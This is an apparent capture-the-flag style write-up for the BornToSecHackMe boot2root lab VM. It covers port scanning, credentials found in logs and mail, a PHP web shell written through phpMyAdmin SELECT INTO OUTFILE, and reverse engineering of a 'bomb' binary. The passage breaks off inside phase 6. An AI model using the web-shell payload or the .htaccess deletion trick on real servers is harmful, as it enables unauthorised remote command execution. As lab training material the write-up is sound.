# Boot 2 root
## Finding the server ip
```bash
> cat scripts/getIp.sh
#!/bin/bash
macAddr=$(vboxmanage showvminfo boot2root | grep "NIC 1:" | awk '{print tolower($4)}' | sed 's/.\{2\}/&:/g' | sed 's/.\{2\}$//')
echo "mac address: $macAddr"
ipAddr=$(nmap -sP 192.168.1.0/24 >/dev/null && arp -an | grep $macAddr | awk '{print $2}' | sed 's/[()]//g')
echo "ip address: $ipAddr"
> scripts/getIp.sh
mac address: 08:00:27:5e:18:ad
ip address: 192.168.1.25
```
## Search open ports
```bash
> nmap 31 192.168.1.25 | grep open
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp open imap
443/tcp open https
993/tcp open imaps
```
Confirmed by:
```bash
> sudo nmap -v -sS -A -T4 192.168.1.25
Discovered open port 80/tcp on 192.168.1.25
Discovered open port 443/tcp on 192.168.1.25
Discovered open port 21/tcp on 192.168.1.25
Discovered open port 22/tcp on 192.168.1.25
Discovered open port 993/tcp on 192.168.1.25
Discovered open port 143/tcp on 192.168.1.25
```
### More info on open ports:
```bash
> sudo nmap -v -sS -A -T4 192.168.1.25
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA)
| 2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA)
|_ 256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hack me if you can
143/tcp open imap Dovecot imapd
|_imap-capabilities: STARTTLS OK more have IDLE SASL-IR LOGINDISABLEDA0001 LITERAL+ post-login ENABLE Pre-login listed capabilities IMAP4rev1 ID LOGIN-REFERRALS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-10-08T20:57:30
| Not valid after: 2025-10-07T20:57:30
| MD5: ea11 cc28 787e 147e a72c 8588 e562 e9b7
|_SHA-1: 2d09 d85f e501 9a67 413e c2d1 6237 11de a91c afbe
|_ssl-date: 2020-06-22T15:14:01+00:00; 0s from scanner time.
443/tcp open ssl/http Apache httpd 2.2.22
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=BornToSec
| Issuer: commonName=BornToSec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-10-08T00:19:46
| Not valid after: 2025-10-05T00:19:46
| MD5: 3f63 02ca 0bb1 e732 9987 6887 3623 86a3
|_SHA-1: eebc f8de 3422 dd63 5314 9d47 811f f6d1 8f77 c98d
|_ssl-date: 2020-06-22T15:14:01+00:00; 0s from scanner time.
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-10-08T20:57:30
| Not valid after: 2025-10-07T20:57:30
| MD5: ea11 cc28 787e 147e a72c 8588 e562 e9b7
|_SHA-1: 2d09 d85f e501 9a67 413e c2d1 6237 11de a91c afbe
|_ssl-date: 2020-06-22T15:14:01+00:00; 0s from scanner time.
MAC Address: 08:00:27:5E:18:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Uptime guess: 0.002 days (since Mon Jun 22 17:11:09 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## nmap with NSE scripts
```bash
> nmap -A -sC -p- -PN -n -T4 --min-parallelism 128 --min-hostgroup 256 --script "auth,exploit,vuln,http-*" -oA with_scripts 192.168.1.25
```
Relevant parts of the output:
```
143/tcp open imap Dovecot imapd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
```
```
| http-enum:
| /forum/: Forum
| /phpmyadmin/: phpMyAdmin
| /webmail/src/login.php: squirrelmail version 1.4.22
|_ /webmail/images/sm_logo.png: SquirrelMail
```
```
|_http-xssed: No previously reported XSS vuln.
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
```
---
## https://192.168.1.25/forum
Message from lmezard:
```
Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2
```
lmezard: `!q\]Ej?*5K5cy*AJ`
laurie@borntosec.net
### laurie webmail
https://192.168.1.25/webmail/
laurie@borntosec.net: `!q\]Ej?*5K5cy*AJ`
```
Subject: Very interesting !!!!
From: qudevide@mail.borntosec.net
Date: Thu, October 8, 2015 11:22 pm
To: laurie@borntosec.net
```
```
Hey Laurie,
You cant connect to the databases now. Use root/Fg-'kKXBj87E:aJ$
```
### phpMyAdmin password
root: `Fg-'kKXBj87E:aJ$`
| user | pass | mail |
| -------- | -------- | -------- |
| admin | ed0fd64f25f3bd3a54f8d272ba93b6e76ce7f3d0516d551c28 | admin@borntosec.net |
| qudevide | a12e059d6f4c21c6c5586283c8ecb2b65618ed0a0dc1b302a2 | qudevide@borntosec.net |
| thor | d30668b779542d60c4cde29e7170148198b1623f4453866797 | thor@borntosec.net |
| wandre | f8562b53084d60efa4208fa50d1ef753ef18e089d2dd56c4ed | wandre@borntosec.net |
| lmezard | 0171e7dbcbf4bd21a732fa859ea98a2950b4f8aa1e5365dc90 | laurie@borntosec.net |
| zaz | f10b3271bf523f12ebd58ef8581c851991bf0d4b4c4bf49d7c | zaz@borntosec.net |
Other lines from the same log:
```
161.202.39.38
invalid user test
invalid user admin
invalid user PlcmSpIp
invalid user ftpuser
invalid user pi
invalid user nvdb
invalid user !q\]Ej?*5K5cy*AJ
11.202.39.38
Invalid user nagios
Invalid user adam
104.245.98.119
Invalid user guest
Invalid user ubnt
Invalid user support
Invalid user test
Invalid user user
Invalid user admin
Invalid user PlcmSpIp
invalid user ftpuser
invalid user pi
Invalid user nagios
invalid user naos
invalid user adm
Oct 5 14:54:17 BornToSecHackMe sudo: pam_unix(sudo:session): session opened for user root by admin(uid=1000)
Oct 5 14:54:18 BornToSecHackMe sudo: pam_unix(sudo:session): session closed for user root
Oct 5 14:54:29 BornToSecHackMe sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/sh
Oct 5 14:57:02 BornToSecHackMe CRON[24211]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 5 14:57:02 BornToSecHackMe CRON[24211]: pam_unix(cron:session): session closed for user root
Oct 5 14:57:56 BornToSecHackMe sudo: root : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/service vsftpd restart
```
```
Oct 5 14:54:29 BornToSecHackMe sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/sh
```
```
sudo: root : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/service vsftpd restart
```
---
## Versions
*Linux*
```
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
```
*MySQL*
```
Server: Localhost via UNIX socket
Server version: 5.5.44-0ubuntu0.12.04.1
Protocol version: 10
User: root@localhost
MySQL charset: UTF-8 Unicode (utf8)
```
*Web server*
```
Apache/2.2.22 (Ubuntu)
MySQL client version: 5.5.44
PHP extension: mysqli
```
*phpMyAdmin*
```
Version information: 3.4.10.1deb1
```
*SquirrelMail*
```
SquirrelMail version 1.4.22
```
*MyLittleForum*
```
Current version: 2.3.4
```
## Passwords
*my little forum*
`lmezard`: `!q\]Ej?*5K5cy*AJ`
The same password can be set on the other accounts through phpMyAdmin.
*SquirrelMail*
`laurie@borntosec.net`: `!q\]Ej?*5K5cy*AJ`
*phpMyAdmin*
`root`: `Fg-'kKXBj87E:aJ$`
## phpMyAdmin shell backdoor
Stack: PHP, Apache, MySQL (LAMP)
So the forum files are most likely stored under `/var/www/`.
Let's try `/var/www/forum`.
Reference for the phpMyAdmin shell backdoor technique:
> https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
### Let's find a writable directory
Clone https://github.com/ilosuna/mylittleforum and check out the forum's version to list its directories:
```bash
> git checkout v2.3.4
> ls -l
total 108
drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 backup
-rw-r--r-- 1 zer0nim zer0nim 15554 juin 29 15:28 CHANGELOG
drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 config
drwxr-xr-x 5 zer0nim zer0nim 4096 juin 29 15:28 images
drwxr-xr-x 3 zer0nim zer0nim 4096 juin 29 15:28 includes
-rw-r--r-- 1 zer0nim zer0nim 7757 juin 29 15:28 index.php
drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 install
drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 js
drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 lang
-rw-r--r-- 1 zer0nim zer0nim 33093 juin 29 15:28 LICENSE
drwxr-xr-x 8 zer0nim zer0nim 4096 juin 29 15:28 modules
-rw-r--r-- 1 zer0nim zer0nim 730 juin 29 15:28 README
drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 templates_c
drwxr-xr-x 3 zer0nim zer0nim 4096 juin 29 15:28 themes
drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 update
```
> backup, config, images, includes, install, js, lang, modules, templates_c, themes, update
#### test `backup` folder
We can remove the `.htaccess` file from the forum's backup folder by:
1. changing the forum admin password,
2. logging in as admin,
3. opening:
```
https://192.168.1.25/forum/index.php?mode=admin&delete_backup_files[]=.htaccess&delete_backup_files_confirm="OK - Delete"
```
Now we can access `https://192.168.1.25/forum/backup/`.
In phpMyAdmin:
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/backup/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/backup/backdoor.php' (Errcode: 13)
#### test `config` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/config/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/config/backdoor.php' (Errcode: 13)
#### test `images` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/images/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/images/backdoor.php' (Errcode: 13)
#### test `includes` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/includes/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/includes/backdoor.php' (Errcode: 13)
#### test `install` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/install/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/install/backdoor.php' (Errcode: 2)
#### test `js` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/js/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/js/backdoor.php' (Errcode: 13)
#### test `lang` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/lang/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/lang/backdoor.php' (Errcode: 13)
#### test `modules` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/modules/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/modules/backdoor.php' (Errcode: 13)
#### test `themes` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/themes/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/themes/backdoor.php' (Errcode: 13)
#### test `update` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/update/backdoor.php"
```
> #1 - Can't create/write to file '/var/www/forum/update/backdoor.php' (Errcode: 13)
#### test `templates_c` folder
```sql
SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/templates_c/backdoor.php"
```
> Your SQL query has been executed successfully ( Query took 0.0002 sec )
It worked 🎉
## Using the backdoor
```
https://192.168.1.25/forum/templates_c/backdoor.php?cmd=whoami
www-data
```
```
https://192.168.1.25/forum/templates_c/backdoor.php?cmd=ls%20/home/
LOOKATME ft_root laurie laurie@borntosec.net lmezard thor zaz
https://192.168.1.25/forum/templates_c/backdoor.php?cmd=ls%20/home/LOOKATME
password
https://192.168.1.25/forum/templates_c/backdoor.php?cmd=cat%20/home/LOOKATME/password
lmezard:G!@M6f4Eatau{sF"
```
`lmezard`: `G!@M6f4Eatau{sF"`
### Trying ssh
```bash
> ssh lmezard@192.168.1.25
____ _______ _____
| _ \ |__ __| / ____|
| |_) | ___ _ __ _ __ | | ___| (___ ___ ___
| _ < / _ \| '__| '_ \| |/ _ \\___ \ / _ \/ __|
| |_) | (_) | | | | | | | (_) |___) | __/ (__
|____/ \___/|_| |_| |_|_|\___/_____/ \___|\___|
Good luck & Have fun
lmezard@192.168.1.25's password:
Permission denied, please try again.
```
### Nope, let's try FTP
ftp://192.168.1.25/
`lmezard`: `G!@M6f4Eatau{sF"`
```
Index of /
Name Size Date Modified
README 96 B 10/15/15, 2:00:00 AM
fun 790 kB 10/8/15, 2:00:00 AM
```
README:
```
Complete this little challenge and use the result as password for user 'laurie' to login in ssh
```
## `fun` challenge
```bash
> tar -xf fun
> ls ft_fun
00M73.pcap 20L0Z.pcap 3W4T7.pcap 5TE6W.pcap 7TNZF.pcap 9NR0E.pcap ...
```
Let's write a script to print all the pcap files sorted by page number:
```python
import os
import re

# each file is a fragment of a C source; a "//fileN" comment at the end of
# the fragment gives its position (page number)
all_files = {}
all_files_sorted = ['' for i in range(755)]
for root, dirs, files in os.walk('ft_fun'):
    for file in files:
        # the files are not real pcaps: read them as bytes and decode loosely
        with open(os.path.join(root, file), 'rb') as f:
            all_files[file] = f.read().decode('latin-1')
        index = all_files[file].find("file")
        if index >= 0:
            # retrieve page number: the first integer following "file"
            snippet = all_files[file][index + 4:][:15]
            numPage = [int(s) for s in re.findall(r'\b\d+\b', snippet)][0]
            # save value in array at page index
            all_files_sorted[numPage] = all_files[file]

i = 0
for val in all_files_sorted:
    print("\n--", i, "------------------------------------------------------------------")
    print(val)
    i += 1
```
We can see a `return` instruction right after each `getmeX()` declaration; this is probably the body of each function.
```bash
> python3 print_sorted.py
```
```
-- 5 ------------------------------------------------------------------
char getme1() {
//file5
-- 6 ------------------------------------------------------------------
return 'I';
//file6
```
```
-- 37 ------------------------------------------------------------------
char getme2() {
//file37
-- 38 ------------------------------------------------------------------
return 'h';
//file38
```
```
-- 56 ------------------------------------------------------------------
char getme3() {
//file56
-- 57 ------------------------------------------------------------------
return 'e';
//file57
```
```
-- 115 ------------------------------------------------------------------
char getme4() {
//file115
-- 116 ------------------------------------------------------------------
return 'a';
//file116
```
```
-- 368 ------------------------------------------------------------------
char getme5() {
//file368
-- 369 ------------------------------------------------------------------
return 'r';
//file369
```
```
-- 521 ------------------------------------------------------------------
char getme6() {
//file521
-- 522 ------------------------------------------------------------------
return 't';
//file522
```
```
-- 736 ------------------------------------------------------------------
char getme7() {
//file736
-- 737 ------------------------------------------------------------------
return 'p';
//file737
```
```c
#include <stdio.h>

char getme1() { return 'I'; }
char getme2() { return 'h'; }
char getme3() { return 'e'; }
char getme4() { return 'a'; }
char getme5() { return 'r'; }
char getme6() { return 't'; }
char getme7() { return 'p'; }
char getme8() { return 'w'; }
char getme9() { return 'n'; }
char getme10() { return 'a'; }
char getme11() { return 'g'; }
char getme12() { return 'e'; }

int main() {
    printf("M");
    printf("Y");
    printf(" ");
    printf("P");
    printf("A");
    printf("S");
    printf("S");
    printf("W");
    printf("O");
    printf("R");
    printf("D");
    printf(" ");
    printf("I");
    printf("S");
    printf(":");
    printf(" ");
    printf("%c", getme1());
    printf("%c", getme2());
    printf("%c", getme3());
    printf("%c", getme4());
    printf("%c", getme5());
    printf("%c", getme6());
    printf("%c", getme7());
    printf("%c", getme8());
    printf("%c", getme9());
    printf("%c", getme10());
    printf("%c", getme11());
    printf("%c", getme12());
    printf("\n");
    printf("Now SHA-256 it and submit");
    return 0;
}
```
`laurie`: `sha256(Iheartpwnage)`
`laurie`: `330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4`
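As an added example (not the write-up's own script), here is a more robust version of the same reassembly: fragments are ordered by their `//fileN` marker, the `getmeN()` bodies are pulled out with a regex once the source is joined, and the password is hashed as the `main` above asks. The fragments below are a constructed sample laid out like the real ones; only the `getmeN()` functions are modelled.

```python
import hashlib
import re

# Constructed sample in the layout the sorted dump above shows: every fragment
# ends with a "//fileN" comment giving its page number, and each getmeN() is
# split over several pages (declaration, return, closing brace).
LETTERS = "Iheartpwnage"
FRAGMENTS = {}
for n, letter in enumerate(LETTERS, start=1):
    page = 10 * n  # page numbers are arbitrary in this sample
    FRAGMENTS["decl%02d.pcap" % n] = "char getme%d() {\n//file%d\n" % (n, page)
    FRAGMENTS["ret%02d.pcap" % n] = "return '%s';\n//file%d\n" % (letter, page + 1)
    FRAGMENTS["end%02d.pcap" % n] = "}\n//file%d\n" % (page + 2)
# a fragment without a marker, to show it is kept but pushed to the end
FRAGMENTS["junk.pcap"] = "printf(\"Now SHA-256 it and submit\");\n"

PAGE_RE = re.compile(r"//file(\d+)")
GETME_RE = re.compile(r"char getme(\d+)\(\)\s*\{\s*return '(.)';\s*\}")

def page_number(fragment):
    """Page index from the fragment's //fileN comment, or None if it has none."""
    m = PAGE_RE.search(fragment)
    return int(m.group(1)) if m else None

def reassemble(fragments):
    """Concatenate fragments in page order (unnumbered ones last), dropping the markers."""
    ordered = sorted(fragments.values(),
                     key=lambda f: (page_number(f) is None, page_number(f) or 0))
    return "".join(PAGE_RE.sub("", f) for f in ordered)

def extract_password(source):
    """The character returned by each getmeN(), concatenated in N order."""
    found = {int(n): c for n, c in GETME_RE.findall(source)}
    return "".join(found[n] for n in sorted(found))

def password_hash(fragments):
    """SHA-256 hex digest of the recovered password, as the program's main() asks."""
    password = extract_password(reassemble(fragments))
    return hashlib.sha256(password.encode()).hexdigest()
```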
## Laurie's bomb challenge
```bash
> ssh laurie@192.168.1.25
laurie@192.168.1.25's password: 330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4
laurie@BornToSecHackMe:~$ ls
README bomb
laurie@BornToSecHackMe:~$ cat README
Diffuse this bomb!
When you have all the password use it as "thor" user with ssh.
HINT:
P
2
b
o
4
NO SPACE IN THE PASSWORD (password is case sensitive).
```
```bash
> ./bomb
Welcome this is my little bomb !!!! You have 6 stages with
only one life good luck !! Have a nice day!
hey
BOOM!!!
The bomb has blown up.
```
```bash
> gdb ./bomb
> i functions
0x08048b20 phase_1
0x08048b48 phase_2
0x08048b98 phase_3
0x08048ca0 func4
0x08048ce0 phase_4
0x08048d2c phase_5
0x08048d98 phase_6
0x08048e94 fun7
0x08048ee8 secret_phase
0x08048f50 sig_handler
0x08048fb4 invalid_phase
0x08048fd8 read_six_numbers
0x08049018 string_length
0x08049030 strings_not_equal
0x0804908c open_clientfd
0x08049160 initialize_bomb
0x0804917c blank_line
0x080491b0 skip
0x080491fc read_line
0x080492c0 send_msg
0x080494fc explode_bomb
0x0804952c phase_defused
0x80489b0 main
```
Translated disassembly of `main`:
```c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

/* defined elsewhere in the binary (see the function list above) */
int strings_not_equal(char *s1, char *s2);
void explode_bomb(void);
void phase_defused(void);
char *read_line(void);
void phase_2(char *str);
void phase_3(char *str);
void phase_4(char *str);
void phase_5(char *str);
void phase_6(char *str);

FILE *infile;

void phase_1(char *str) {
    if (strings_not_equal(str, "Public speaking is very easy.")) {
        explode_bomb();
    }
}

void sig_handler(int sig) {
    (void)sig;
    printf("So you think you can stop the bomb with ctrl-c, do you?\n");
    sleep(3);
    printf("Well...");
    fflush(stdout);
    sleep(1);
    printf("OK. :-)\n");
    exit(16);
}

void initialize_bomb(void) {
    // call sig_handler on ctrl+c (signal 2 == SIGINT)
    signal(SIGINT, sig_handler);
}

int main(int ac, char **av) {
    if (ac == 1) {
        infile = stdin;
    }
    else if (ac == 2) {
        infile = fopen(av[1], "r");
        if (infile == 0) {
            printf("%s: Error: Couldn't open %s\n", av[0], av[1]);
            exit(8);
        }
    }
    else {
        printf("Usage: %s [<input_file>]\n", av[0]);
        exit(8);
    }
    initialize_bomb();
    printf("Welcome this is my little bomb !!!! You have 6 stages with\n");
    printf("only one life good luck !! Have a nice day!\n");
    char *input;
    input = read_line();
    phase_1(input);
    phase_defused();
    printf("Phase 1 defused. How about the next one?\n");
    input = read_line();
    phase_2(input);
    phase_defused();
    printf("That's number 2. Keep going!\n");
    input = read_line();
    phase_3(input);
    phase_defused();
    printf("Halfway there!\n");
    input = read_line();
    phase_4(input);
    phase_defused();
    printf("So you got that one. Try this one.\n");
    input = read_line();
    phase_5(input);
    phase_defused();
    printf("Good work! On to the next...\n");
    input = read_line();
    phase_6(input);
    phase_defused();
    return 0;
}
```
#### Phase 2
```c
void read_six_numbers(char *param_1, int param_2)
{
    int iVar1;
    iVar1 = sscanf(param_1, "%d %d %d %d %d %d", param_2, param_2 + 4, param_2 + 8, param_2 + 0xc,
                   param_2 + 0x10, param_2 + 0x14);
    if (iVar1 < 6) {
        explode_bomb();
    }
    return;
}
void phase_2(char *param_1)
{
    int iVar1;
    int aiStack32[7];
    read_six_numbers(param_1, (int)(aiStack32 + 1));
    if (aiStack32[1] != 1) {
        explode_bomb();
    }
    iVar1 = 1;
    do {
        if (aiStack32[iVar1 + 1] != (iVar1 + 1) * aiStack32[iVar1]) {
            explode_bomb();
        }
        iVar1 = iVar1 + 1;
    } while (iVar1 < 6);
    return;
}
```
```text
aiStack32[1] = 1
aiStack32[2] = (1 + 1) * 1 = 2
aiStack32[3] = (2 + 1) * 2 = 6
aiStack32[4] = (3 + 1) * 6 = 24
aiStack32[5] = (4 + 1) * 24 = 120
aiStack32[6] = (5 + 1) * 120 = 720
```
```bash
laurie@BornToSecHackMe:~$ cat /tmp/tmp.8HZU7UDMYA
Public speaking is very easy.
1 2 6 24 120 720
laurie@BornToSecHackMe:~$ ./bomb /tmp/tmp.8HZU7UDMYA
Welcome this is my little bomb !!!! You have 6 stages with
only one life good luck !! Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
^CSo you think you can stop the bomb with ctrl-c, do you?
^[[A^CWell...OK. :-)
```
#### Phase 3
```c
void phase_3(char *param_1)
{
    int iVar1;
    char cVar2;
    uint local_10;
    char local_9;
    int local_8;
    iVar1 = sscanf(param_1, "%d %c %d", &local_10, &local_9, &local_8);
    if (iVar1 < 3) {
        explode_bomb();
    }
    switch (local_10) {
    case 0:
        cVar2 = 'q';
        if (local_8 != 0x309) {
            explode_bomb();
        }
        break;
    case 1:
        cVar2 = 'b';
        if (local_8 != 0xd6) {
            explode_bomb();
        }
        break;
    case 2:
        cVar2 = 'b';
        if (local_8 != 0x2f3) {
            explode_bomb();
        }
        break;
    case 3:
        cVar2 = 'k';
        if (local_8 != 0xfb) {
            explode_bomb();
        }
        break;
    case 4:
        cVar2 = 'o';
        if (local_8 != 0xa0) {
            explode_bomb();
        }
        break;
    case 5:
        cVar2 = 't';
        if (local_8 != 0x1ca) {
            explode_bomb();
        }
        break;
    case 6:
        cVar2 = 'v';
        if (local_8 != 0x30c) {
            explode_bomb();
        }
        break;
    case 7:
        cVar2 = 'b';
        if (local_8 != 0x20c) {
            explode_bomb();
        }
        break;
    default:
        cVar2 = 'x';
        explode_bomb();
    }
    if (cVar2 != local_9) {
        explode_bomb();
    }
    return;
}
```
Several strings pass the test ("0 q 777" works, for example), but because the README says the second character is `b`, the password we want is `1 b 214`.
```bash
laurie@BornToSecHackMe:~$ cat /tmp/tmp.8HZU7UDMYA
Public speaking is very easy.
1 2 6 24 120 720
1 b 214
laurie@BornToSecHackMe:~$ ./bomb /tmp/tmp.8HZU7UDMYA
Welcome this is my little bomb !!!! You have 6 stages with
only one life good luck !! Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
```
#### Phase 4
```c
int func4(int nb) {
    // Fibonacci: func4(0) = func4(1) = 1, func4(n) = func4(n - 1) + func4(n - 2)
    if (nb <= 1) {
        return 1;
    }
    return func4(nb - 1) + func4(nb - 2);
}

void phase_4(char *str) {
    int nb;
    // sscanf must have parsed exactly one number, and it must not be negative
    if (sscanf(str, "%d", &nb) != 1 || nb < 0) {
        explode_bomb();
    }
    if (func4(nb) != 55) {
        explode_bomb();
    }
}
```
`func4` is a Fibonacci-sequence function; the program expects it to return 55, so we just need to send it 9.
```bash
laurie@BornToSecHackMe:~$ cat /tmp/tmp.8HZU7UDMYA
Public speaking is very easy.
1 2 6 24 120 720
1 b 214
9
./bomb test
Welcome this is my little bomb !!!! You have 6 stages with
only one life good luck !! Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
```
#### Phase 5
```asm
array.123
0804b220 69 ; i
0804b221 73 ; s
0804b222 72 ; r
0804b223 76 ; v
0804b224 65 ; e
0804b225 61 ; a
0804b226 77 ; w
0804b227 68 ; h
0804b228 6f ; o
0804b229 62 ; b
0804b22a 70 ; p
0804b22b 6e ; n
0804b22c 75 ; u
0804b22d 74 ; t
0804b22e 66 ; f
0804b22f 67 ; g
```
```c
void phase_5(char *param_1) {
    int i;
    char str[6];
    undefined local_6;
    i = string_length(param_1);
    if (i != 6) {
        explode_bomb();
    }
    i = 0;
    do {
        str[i] = (&array.123)[(char)(param_1[i] & 0xf)];
        i = i + 1;
    } while (i < 6);
    local_6 = 0;
    i = strings_not_equal(str, "giants");
    if (i != 0) {
        explode_bomb();
    }
}
```
We can see that the string passed to the function determines the string `local_c` (`str` above) by using the characters of the input string `& 0xf` as indexes into the string `array.123 = "isrveawhobpnutfg"`.
So we just need to send bytes whose low nibble is the index we want, while avoiding `\x00` for index 0: `string_length` would stop there, `iVar1` would differ from 6 and the function would go through `explode_bomb()`.
In our case we want the final string to equal `giants`, so we can send this:
```
15 0 5 11 13 1
g i a n t s
```
```
15 1111
0 0000
5 0101
11 1011
13 1101
1 0001
```
We need ASCII codes that end with these 4 bits.
```
o 0110 1111
p 0111 0000
e 0110 0101 or u 0111 0101
k 0110 1011
m 0110 1101
a 0110 0001 or q 0111 0001
```
so we can enter `opekma`, `opukma`, `opukmq` or `opekmq`
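Added example, not part of the original write-up: a Python model of the `phase_5` transform that enumerates every input over a given alphabet mapping onto `giants`. Restricted to lowercase letters it recovers exactly the four strings above; with a larger alphabet (both cases) it shows how many more candidates the low-nibble lookup accepts.

```python
import itertools
import string

# lookup table array.123 dumped above; the bomb indexes it with the low
# nibble (c & 0xf) of each input character
ARRAY_123 = "isrveawhobpnutfg"
TARGET = "giants"

def phase_5_transform(inp):
    """Model of phase_5: None if the bomb would explode, else the mapped string."""
    # string_length() stops at a NUL byte, so the length check rejects it too
    if len(inp) != 6 or "\x00" in inp:
        return None
    return "".join(ARRAY_123[ord(c) & 0xf] for c in inp)

def phase_5_candidates(alphabet=string.ascii_lowercase, target=TARGET):
    """Every string over `alphabet` that phase_5 maps onto `target`, sorted."""
    per_position = []
    for want in target:
        idx = ARRAY_123.index(want)          # nibble each input byte must end with
        per_position.append([c for c in alphabet if ord(c) & 0xf == idx])
    return sorted("".join(p) for p in itertools.product(*per_position))
```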
#### Phase 6
```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

void explode_bomb(void);
void read_six_numbers(char *str, int *out);

/* list nodes as laid out in the binary: { value, index, address of the next node } */
int node1[3] = { 253, 1, 134525500 };
int node2[3] = { 725, 2, 134525488 };
int node3[3] = { 301, 3, 134525548 };
int node4[3] = { 997, 4, 134525536 };
int node5[3] = { 212, 5, 0 };
int node6[3] = { 432, 6, 134525524 };

/* follow the "next" field, stored as an address in slot 2 */
#define NEXT(node) ((int *)(intptr_t)(node)[2])

void phase_6(char *input_strings) {
    unsigned i, j;
    int nbs[6];
    read_six_numbers(input_strings, nbs);
    // every number must be in 1..6 (unsigned compare) and all six must differ
    i = 0;
    do {
        if ((unsigned)(nbs[i] - 1) > 5)
            explode_bomb();
        j = i + 1;
        while (j < 6) {
            if (nbs[i] == nbs[j])
                explode_bomb();
